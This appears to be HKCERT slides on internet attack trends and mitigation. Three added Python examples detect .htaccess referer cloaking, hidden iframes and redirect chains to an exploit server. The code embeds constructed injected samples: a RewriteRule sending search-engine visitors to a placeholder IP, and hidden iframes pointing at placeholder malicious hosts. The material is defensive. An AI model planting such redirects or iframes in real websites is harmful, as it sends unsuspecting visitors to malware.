Internet Attack Trend and Defense
SC Leung, Senior Consultant
Agenda: trend of the information security threat; how we become victims; the most economical way to mitigate risks.
Security Threat Landscape
Attacks target our vulnerabilities
System and applications: insecure configuration defaults (AutoRun for USB drives and CD-ROMs, ...); all software has security holes; there is an opportunity window between the discovery of a security hole and the availability of a patch.
Human: people can be cheated by "social engineering" techniques. How can you gain trust from others == how can a hacker gain trust from you.
New phishing tactic targets tabs ("tabnabbing"): a page that has lost focus rewrites its own content and favicon to look like the login page of a site the user trusts, so the user re-enters credentials when returning to the tab. http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/ (proof of concept included); http://krebsonsecurity.com/2010/05/devious-new-phishing-tactic-targets-tabs/
Botnet (roBot Network) is the major threat. A bot herder controls the infected machines (bots) through a command and control (C&C) centre, and the bots attack your computers! [Diagram: bot herder, C&C centre, bots, victims]
Maturity of the underground economy: sell products (credentials, malware and tools); hosting (spam or phishing hosting); CaaS (cybercrime as a service), the hired gun. Characteristics: commercialization; professionalization; manageability of infrastructure (botnets); specialization, outsourcing and globalization of HR; chained exploits; risk management; invisibility; security (authentication, encryption); survivability, e.g. the sophistication of Conficker.
Malware 2.0: evade detection; command and control; propagation (forming a botnet); manage and update; survive adverse conditions. Malware today causes the victim PC to become part of a botnet.
Malware 2.0 evasion: encryption or obfuscation; morphing; using search engines to evade detection. The malicious URL is served only when the visitor was referred by a search engine, so a site owner who types the address directly sees the clean page. This is done by configuring the ".htaccess" file of the compromised web server, typically with a mod_rewrite rule keyed on the HTTP Referer header. [Slide shows sample content of a ".htaccess" file under the hacker's control]
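The following is an added example and not code from the HKCERT slides. It shows the referer-keyed cloaking pattern described above as a web administrator would look for it: an Apache ".htaccess" is parsed, each RewriteRule is paired with the RewriteCond lines that govern it, and any rule that redirects to an external host only when the Referer names a search engine is flagged. The sample ".htaccess" is a constructed reconstruction of the pattern, not the file on the slide; the redirect target 198.51.100.23 and the hostname www.example.com are placeholders.

```python
"""Flag referer-keyed redirect rules in an Apache .htaccess file.

Added example (not from the HKCERT slides). In mod_rewrite, RewriteCond lines
apply only to the RewriteRule that follows them, so a redirect that fires only
for search-engine referers looks like: RewriteCond on %{HTTP_REFERER} naming
google/yahoo/..., followed by a RewriteRule to an external URL.
"""
from urllib.parse import urlparse

SEARCH_ENGINES = ("google", "yahoo", "bing", "msn", "ask", "aol")

# Constructed sample of an injected .htaccess (placeholder target address).
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|msn|ask|aol).*$ [NC]
RewriteRule ^(.*)$ http://198.51.100.23/in.php?q=$1 [R=302,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""


def parse_rules(text):
    """Group each RewriteRule with the RewriteCond lines that precede it."""
    rules, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            # (test variable, pattern, flags)
            pending.append((parts[1], parts[2], " ".join(parts[3:])))
        elif directive == "rewriterule" and len(parts) >= 3:
            rules.append({"pattern": parts[1], "target": parts[2],
                          "flags": " ".join(parts[3:]), "conds": pending})
            pending = []  # conditions are consumed by this rule
    return rules


def suspicious_rules(text, own_hosts=()):
    """Return (target, engines) for every rule that redirects to a host not in
    own_hosts and is gated on the Referer naming a search engine."""
    hits = []
    for rule in parse_rules(text):
        engines = set()
        for var, pattern, _flags in rule["conds"]:
            if "HTTP_REFERER" in var.upper():
                engines.update(e for e in SEARCH_ENGINES if e in pattern.lower())
        host = urlparse(rule["target"]).hostname  # None for relative targets
        if engines and host and host not in own_hosts:
            hits.append((rule["target"], sorted(engines)))
    return hits


if __name__ == "__main__":
    for target, engines in suspicious_rules(SAMPLE_HTACCESS, own_hosts=("www.example.com",)):
        print("referer-cloaked redirect to", target, "keyed on", ", ".join(engines))
```

Because the rule never fires without a matching Referer, checking the site from a browser with no referer shows nothing; the file itself, or a request sent with a search-engine Referer header, is what reveals the cloaking.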
Malware propagation channels: executables, document malware, websites.
Executables: fake security software; fake video player codecs.
Document malware: malware embedded in PDF or Office files; the Zeus botnet served PDF malware (Apr 2010). [Image by Websense]
Websites: legitimate and trusted websites are compromised and used to redirect users to malicious websites via injected invisible iframes. Most significant: web admins are usually unable to detect and mitigate the risk.
Malware propagation via websites: mass infection of WordPress blogs hosted by Network Solutions (Apr 2010), exploiting insecure web application configuration.
PHPNuke.org website hacked (7 May 2010), serving several exploits.
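An added example, not code from the HKCERT slides, for the invisible-iframe injection described above: a scanner a web admin can run over a page to find iframes that the browser loads but the visitor cannot see (zero or one-pixel size, display:none, visibility:hidden, or positioned far off-screen) and that point to a host other than the site's own. It uses only the Python standard library; the HTML page and the hosts in it are constructed for the example.

```python
"""Find hidden iframes pointing at foreign hosts in a web page.

Added example (not from the HKCERT slides). Injected iframes are hidden by
size (0 or 1 pixel), CSS (display:none, visibility:hidden) or off-screen
positioning; a visible, same-site iframe is normal and is not reported.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:left|top)\s*:\s*-\d{3,}px|(?:width|height)\s*:\s*0(?:px)?\b", re.I)


def _is_tiny(value):
    """True for width/height attributes of 0 or 1 (pixel)."""
    return value is not None and value.strip().rstrip("px").strip() in ("0", "1")


class IframeScanner(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = urlparse(src).hostname  # None for relative (same-site) sources
        hidden = (_is_tiny(a.get("width")) or _is_tiny(a.get("height"))
                  or bool(HIDDEN_STYLE.search(a.get("style") or "")))
        if hidden and host and host != self.own_host:
            self.findings.append({"src": src, "line": self.getpos()[0]})


def hidden_external_iframes(html, own_host):
    """Return [{'src': ..., 'line': ...}] for each hidden foreign iframe."""
    scanner = IframeScanner(own_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: one legitimate widget, two injected hidden iframes.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<p>Trusted content.</p>
<iframe src="http://203.0.113.7/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://malicious.example.net/x.php" style="position:absolute;left:-5000px"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for f in hidden_external_iframes(SAMPLE_PAGE, "www.example.com"):
        print("line", f["line"], "hidden iframe ->", f["src"])
```

Run it against the HTML as fetched from the server, not against the files on disk alone: injections done through the web server configuration or the database only appear in the served page.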
Social engineering and black-hat SEO: hackers exploit social network services to convince victims; hackers use search engine optimization techniques to push malicious websites up the search result rankings.
Targeted attacks: targeted, crafted email sent to corporations and government.
Attacks following the money. Targeting traditional online banking and online games: obtaining credentials for later use or for sale, via keyloggers, phishing and banking trojans. Targeting new online banking services, especially those with two-factor authentication: performing the transaction on the spot via advanced banking trojans using man-in-the-browser techniques.
Data leakage. P2P file sharing: insecure default settings; malware embedded in P2P software, e.g. the Foxy software. Social networking services: insecure default privacy settings; leakage of personal information by friends; lack of control over third-party apps on SNS; malware on SNS.
Social network risks: ID theft, data leakage, social engineering.
Client-side attacks via social network sites: surge in Facebook malware. TRUST: a social engineering trick spoofs the user's friend and sends a message with a URL purporting to be a movie; the URL brings the user to a fake YouTube site, which suggests installing a codec in order to view the movie ("Install the codec to view the movie").
Submitting the malware to VirusTotal.com: only a small portion of the scanners identify it.
Malicious servers redirect victims to an exploit server that acts as a central delivery point (redirection of attacks to a central exploit server). Source: http://www.honeynet.org/papers/mws/KYE-Malicious_Web_Servers.htm
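An added example, not code from the Honeynet paper or the HKCERT slides, for the redirection infrastructure described above: a resolver that follows a chain from a compromised page through redirectors to its final host, using HTTP Location headers, meta refresh, simple JavaScript location assignments and hidden iframe sources, and then groups the starting URLs by the host their chains end on, which exposes a shared exploit server. fetch() is a stand-in for a real HTTP client, fed by a constructed table of responses so the example runs offline; every host and path in it is made up.

```python
"""Map redirect chains from compromised sites to a central exploit server.

Added example (not from the Honeynet paper or the HKCERT slides). A real
tool would replace fetch() with an HTTP GET sent with a browser User-Agent
and a search-engine Referer, since the redirectors often key on both.
"""
import re
from collections import defaultdict
from urllib.parse import urljoin, urlparse

META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv=["\']?refresh["\']?[^>]*content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)', re.I)
JS_LOCATION = re.compile(
    r'(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)
IFRAME_SRC = re.compile(r'<iframe[^>]+src=["\']?([^"\'\s>]+)', re.I)

# Constructed responses: url -> (status, Location header or None, body).
RESPONSES = {
    "http://blog1.example.org/": (200, None,
        '<html><body>post<iframe src="http://counter.example.net/in.cgi?1" width="0" height="0"></iframe></body></html>'),
    "http://blog2.example.org/news": (200, None,
        '<html><head><meta http-equiv="refresh" content="0;url=http://counter.example.net/in.cgi?2"></head></html>'),
    "http://counter.example.net/in.cgi?1": (302, "http://203.0.113.9/exp/index.php", ""),
    "http://counter.example.net/in.cgi?2": (200, None,
        '<script>window.location.href="http://203.0.113.9/exp/index.php";</script>'),
    "http://203.0.113.9/exp/index.php": (200, None, "<html>exploit kit landing page</html>"),
    "http://shop.example.com/": (200, None, "<html>clean page</html>"),
}


def fetch(url):
    """Stand-in for an HTTP GET; unknown URLs behave like a 404."""
    return RESPONSES.get(url, (404, None, ""))


def next_hop(url, status, location, body):
    """Return (how, absolute_url) of the next hop, or (None, None)."""
    if 300 <= status < 400 and location:
        return "http", urljoin(url, location)
    for kind, rx in (("meta", META_REFRESH), ("js", JS_LOCATION), ("iframe", IFRAME_SRC)):
        m = rx.search(body)
        if m:
            return kind, urljoin(url, m.group(1))
    return None, None


def follow(start, max_hops=8):
    """Return the chain as [(url, how_reached), ...]; stops at a page with
    no onward hop, at a loop, or after max_hops."""
    chain, seen, url, how = [], set(), start, "start"
    while url and url not in seen and len(chain) < max_hops:
        seen.add(url)
        chain.append((url, how))
        status, location, body = fetch(url)
        how, url = next_hop(url, status, location, body)
    return chain


def group_by_landing(starts):
    """Group start URLs by the final host of their chain."""
    groups = defaultdict(list)
    for s in starts:
        final_url = follow(s)[-1][0]
        groups[urlparse(final_url).hostname].append(s)
    return dict(groups)


if __name__ == "__main__":
    starts = ["http://blog1.example.org/", "http://blog2.example.org/news", "http://shop.example.com/"]
    for host, origins in group_by_landing(starts).items():
        print(host, "<-", origins)
```

The grouping is the useful part for a CERT: many unrelated compromised sites whose chains all end on one host identify the exploit server that a single takedown or blocklist entry can neutralise.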
Mobile computing. Attacks exist for different mobile platforms: Nov 2009 attacks on jailbroken iPhones through SSH left running with the unchanged default root password; MobileSpy logs GPS location, call logs and SMS logs, with versions available for Android, BlackBerry, iPhone, Windows Mobile and Symbian. Devices store personal and sensitive data; some banks (Lloyds TSB in the UK) have started to use the phone as the client tool; next-generation data/voice integration. Insecure habits are common: short URLs, clicking links in email, saved passwords. Security protection is less mature than on the PC.
Targeted attacks continue: chained exploits; Advanced Persistent Threats against governments, critical infrastructure and private companies.
Consequence of Attack
Consequences of security exposure: machines fall under the control of hackers; theft of credentials, leading to financial loss; the hacker launches local attacks against the whole network; bandwidth and performance degrade; legal liability for hacking activity originating from your premises.
Mitigation Strategies Revisited
What do we do? International collaboration (a good example is the Conficker Working Group, which collects information on hacker behaviour); cyber drill exercises; proactive discovery of incidents; intelligence and research, finding compromised websites and malware hosting.
Awareness, education and training. Awareness: social engineering; emerging attacks via SNS and mobile. Social engineering drill exercise. Publish guidelines. Training of staff. Local cyber response drills (some teams hold one annually). Form an ISAC (Information Sharing and Advisory Centre) with the public ISPs.
Proactivity in incident handling at HKCERT. Incident report statistics (3 Apr to 30 Sep 2009):
Traditional reports vs proactive discovery (searching for incidents that were not reported): traditional reports 493 (60%); proactive discovery 330 (40%).
Among the 493 traditional reports, by channel: direct phone-in 244 (49.5%), referral 170 (34.5%), direct email 79 (16%); by origin: local parties 329 (67%), overseas parties 164 (33%).
Conclusion: proactive discovery is becoming a key source of incident reports, and overseas and referral reports make up a significant portion. We are aware that more resources are required for handling external communication and for developing automated search capability.
What can you do – infrastructure?
Personal: install antivirus; install a personal firewall; close all security holes: patch systems, set strong passwords, close insecure default settings (Autorun, ...).
Company: install antivirus; install a firewall and block all incoming traffic except known services; separate SAMS, ITED and public servers into zones; set up a security policy; ban unauthorized servers in your network.
HKCERT guidelines: "Autorun virus" Removal Procedure; SQL Injection Defense Guideline; Data Protection Guideline; Guideline for Safely Using Wireless LAN; SME Information Security Guideline; Guideline for Prevention of Spyware and other Potentially Unwanted Software. http://www.hkcert.org/english/sguide_faq/home.html
Point of contact: Phone +852 8105 6060; Fax +852 8105 9760; Email hkcert@hkcert.org; URL http://www.hkcert.org/
